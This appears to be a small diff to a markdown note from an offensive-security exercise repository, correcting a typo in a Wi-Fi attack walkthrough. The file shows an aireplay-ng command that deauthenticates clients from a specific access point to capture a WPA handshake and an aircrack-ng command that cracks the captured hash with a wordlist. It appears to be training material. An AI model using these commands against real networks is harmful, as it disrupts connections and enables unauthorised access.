Wodajo/Offensive/workout/1st-red-project/zad3-2.md

 `sudo aireplay-ng --deauth 30 -a BA:18:69:CC:1E:61 wlan0mon`
 `--deauth 30` We're sending 30 packets so as to break connection for a while
-Bcause of this will be able to capture handshake (and password hash for later cracking)
+Because of this we'll be able to capture handshake (and password hash for later cracking)
 ![nasmarowana maslem](./img/airodump-ng-3.png)

 `sudo aircrack-ng WPAcrack-01.cap -w rockyou_50.txt`  password hash cracking